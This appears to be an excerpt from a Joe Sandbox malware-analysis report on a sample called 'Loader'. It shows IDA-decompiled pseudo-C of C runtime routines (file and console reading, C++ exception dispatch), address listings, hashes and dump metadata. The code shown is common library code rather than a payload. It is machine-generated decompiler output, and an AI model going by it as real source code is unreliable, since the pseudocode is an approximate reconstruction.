						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00AEF21B( *_t137))) = 9;
						L60:
						_t139 = E00AED23F();
						goto L61;
					}
					__eflags = _t198 -  *0xb38730; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xb38530 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00AEF208(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00AEF21B(__eflags))) = 0x16;
								E00AED23F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00AF548F(_t154);
								E00AF4AEF(0);
								E00AF4AEF(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00AF9E59(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xb38530 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xb38530 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xb38530 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb38530 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xb38530 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb38530 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xb38530 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00B013B1(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00AEF1E5(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00AEF21B(__eflags))) = 9;
											 *(E00AEF208(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xb38530 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00AF9471();
												} else {
													_t170 = E00AF9777();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00AF9620(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xb38530 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t108 =  &_v28; // 0xa
									_t174 = GetConsoleMode( *_t108,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00AEF21B(__eflags))) = 0xc;
									 *(E00AEF208(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00AF4AEF(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xb38530 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00AEF208(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00AEF21B(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00AEF208(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00AEF21B(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00af990f
0x00af9913
0x00af9916
0x00af9930
0x00af9932
0x00af9c97
0x00af9c97
0x00af9c9c
0x00af9c9c
0x00af9ca4
0x00af9caa
0x00af9caa
0x00000000
0x00af9caa
0x00af9938
0x00af993e
0x00000000
0x00000000
0x00af9948
0x00af994e
0x00af9951
0x00af9954
0x00af995e
0x00af9961
0x00af9964
0x00af9968
0x00af996a
0x00000000
0x00000000
0x00af9970
0x00af9973
0x00af9979
0x00af9993
0x00af9995
0x00af9c93
0x00000000
0x00af9c93
0x00af999b
0x00af999e
0x00000000
0x00000000
0x00af99a4
0x00af99a8
0x00000000
0x00000000
0x00af99ae
0x00af99b1
0x00af99b5
0x00af99bc
0x00af99be
0x00af99be
0x00af99c1
0x00af9a16
0x00af9a18
0x00af99de
0x00af99e3
0x00af99ea
0x00af99f0
0x00000000
0x00af9a1a
0x00af9a1c
0x00af9a1d
0x00af9a1f
0x00af9a22
0x00af9a24
0x00af9a26
0x00af9a28
0x00af9a28
0x00af9a33
0x00af9a35
0x00af9a3c
0x00af9a41
0x00af9a44
0x00af9a47
0x00af9a49
0x00af9a6d
0x00af9a75
0x00af9a78
0x00af9a7f
0x00af9a86
0x00af9a8a
0x00af9a8c
0x00af9a8f
0x00af9a96
0x00af9a96
0x00af9a99
0x00af9a9b
0x00af9a9e
0x00af9aa3
0x00af9aa6
0x00af9aaf
0x00af9ab3
0x00af9ab6
0x00af9ab8
0x00af9abe
0x00af9ac0
0x00af9ac9
0x00af9aca
0x00af9acc
0x00af9ad0
0x00af9ad1
0x00af9ad5
0x00af9ad8
0x00af9ae2
0x00af9ae7
0x00af9aea
0x00af9af9
0x00af9afd
0x00af9b00
0x00af9b02
0x00af9b04
0x00af9b06
0x00af9b0b
0x00af9b0d
0x00af9b11
0x00af9b12
0x00af9b18
0x00af9b22
0x00af9b23
0x00af9b26
0x00af9b2b
0x00af9b2e
0x00af9b3d
0x00af9b41
0x00af9b44
0x00af9b46
0x00af9b48
0x00af9b4a
0x00af9b4c
0x00af9b52
0x00af9b52
0x00af9b53
0x00af9b62
0x00af9b65
0x00af9b66
0x00af9b66
0x00af9b4a
0x00af9b46
0x00af9b2e
0x00af9b06
0x00af9b02
0x00af9aea
0x00af9ac0
0x00af9ab8
0x00af9b6c
0x00af9b72
0x00af9b74
0x00af9be7
0x00af9be7
0x00af9beb
0x00af9bfb
0x00af9c01
0x00af9c03
0x00af9c5f
0x00af9c5f
0x00af9c67
0x00af9c68
0x00af9c6a
0x00af9c83
0x00af9c86
0x00af9bc3
0x00af9bc4
0x00000000
0x00af9bc9
0x00af9c8c
0x00000000
0x00af9c8c
0x00af9c71
0x00af9c7c
0x00000000
0x00af9c7c
0x00af9c05
0x00af9c08
0x00af9c0b
0x00000000
0x00000000
0x00af9c0d
0x00af9c0d
0x00af9c10
0x00af9c13
0x00af9c16
0x00af9c1d
0x00af9c22
0x00af9c24
0x00af9c28
0x00af9c43
0x00af9c47
0x00af9c48
0x00af9c4b
0x00af9c4c
0x00af9c58
0x00af9c4e
0x00af9c4e
0x00af9c4e
0x00af9c2a
0x00af9c2a
0x00af9c2a
0x00af9c35
0x00af9c3a
0x00af9c3d
0x00af9c3d
0x00000000
0x00af9c22
0x00af9b79
0x00af9b7c
0x00af9b83
0x00af9b88
0x00000000
0x00000000
0x00af9b8e
0x00af9b91
0x00af9b97
0x00af9b99
0x00000000
0x00000000
0x00af9b9b
0x00af9b9f
0x00000000
0x00000000
0x00af9bb3
0x00af9bb9
0x00af9bbb
0x00af9bdf
0x00af9be2
0x00000000
0x00af9be2
0x00af9bbd
0x00000000
0x00af9a4b
0x00af9a50
0x00af9a5b
0x00af9bca
0x00af9bca
0x00af9bca
0x00af9bcd
0x00af9bce
0x00000000
0x00af9bd6
0x00af9a49
0x00af9a18
0x00af99c3
0x00af99c6
0x00af99da
0x00af99dc
0x00af99fd
0x00af9a00
0x00af9a03
0x00af9a06
0x00000000
0x00af9a06
0x00000000
0x00af99c8
0x00af99c8
0x00af99cb
0x00af99ce
0x00000000
0x00af99ce
0x00af99c6
0x00af997b
0x00af9980
0x00af9988
0x00000000
0x00af9918
0x00af991d
0x00af9920
0x00af9925
0x00af9caf
0x00000000
0x00af9caf

Strings

, xrefs: 00AF9B8E

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: acc8003436539959de331568319b379a2ba890b9cba277fc6c50e55bb3c73714
Instruction ID: 4a1bdbccc214f931d80de46199c286ddd2a9ce2475febb11c816b57be5c1183e
Opcode Fuzzy Hash: acc8003436539959de331568319b379a2ba890b9cba277fc6c50e55bb3c73714
Instruction Fuzzy Hash: 93C10D70A0464DAFDF15DFD9E880BBFBBB4AF59300F104159F645AB292DB709942CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00AEC0C8 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00AEC0C8(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E00AED028(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E00AF0E59(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E00AEBD4C(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E00AEBD4C(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E00AEA068(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E00AE9F9B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00AEC048(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E00AF0E59(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E00AEBD4C(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E00AEBD4C(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E00AEBD4C(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E00AEBD4C(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E00AE9F9B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00AEC048(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00AEAA4E(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E00AEBD4C(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E00AECAD7(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E00AEBD4C(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E00AEBD4C(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00AEBD4C(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E00AEBD4C(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E00AECAD7(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E00AF3B37(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E00AEC76B( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0xb37750) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E00AEAA4E(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E00AEC753( &_v64);
											E00AE9F2F( &_v64, 0xb12b14);
											L63:
											 *(E00AEBD4C(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E00AEBD4C(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E00AEA18E(_t279, _t319, _t274);
											E00AEC9D7(_a8, _a16, _t305);
											_t235 = E00AECB94(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E00AEC94E(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x00aec0c8
0x00aec0cf
0x00aec0d1
0x00aec0da
0x00aec0e0
0x00aec0e8
0x00aec0ea
0x00aec0ed
0x00aec0f3
0x00aec46c
0x00aec46c
0x00aec471
0x00aec473
0x00aec475
0x00aec478
0x00aec479
0x00aec47c
0x00aec482
0x00aec5a1
0x00aec488
0x00aec48a
0x00aec491
0x00aec494
0x00aec497
0x00aec49d
0x00aec49f
0x00aec4a4
0x00aec4a7
0x00aec4a9
0x00aec4af
0x00aec4b1
0x00aec4b7
0x00aec4cc
0x00aec4d1
0x00aec4d4
0x00aec4d6
0x00aec59d
0x00000000
0x00aec59e
0x00aec4d6
0x00aec4b7
0x00aec4af
0x00aec4a7
0x00aec4dc
0x00aec4df
0x00aec4e2
0x00aec4e5
0x00aec4e8
0x00aec4ee
0x00aec500
0x00aec505
0x00aec508
0x00aec50b
0x00aec50e
0x00aec511
0x00aec514
0x00aec517
0x00000000
0x00000000
0x00aec51d
0x00aec51d
0x00aec520
0x00aec523
0x00aec532
0x00aec533
0x00aec533
0x00aec535
0x00aec538
0x00000000
0x00000000
0x00aec53a
0x00aec53d
0x00000000
0x00000000
0x00aec54b
0x00aec54d
0x00aec550
0x00aec552
0x00aec55a
0x00aec55a
0x00aec55d
0x00aec55f
0x00aec561
0x00aec57d
0x00aec582
0x00aec585
0x00aec585
0x00000000
0x00aec55d
0x00aec554
0x00aec558
0x00000000
0x00000000
0x00000000
0x00aec588
0x00aec58b
0x00aec58c
0x00aec58f
0x00aec592
0x00aec595
0x00aec598
0x00aec598
0x00000000
0x00aec523
0x00aec5a2
0x00aec5a7
0x00aec5a8
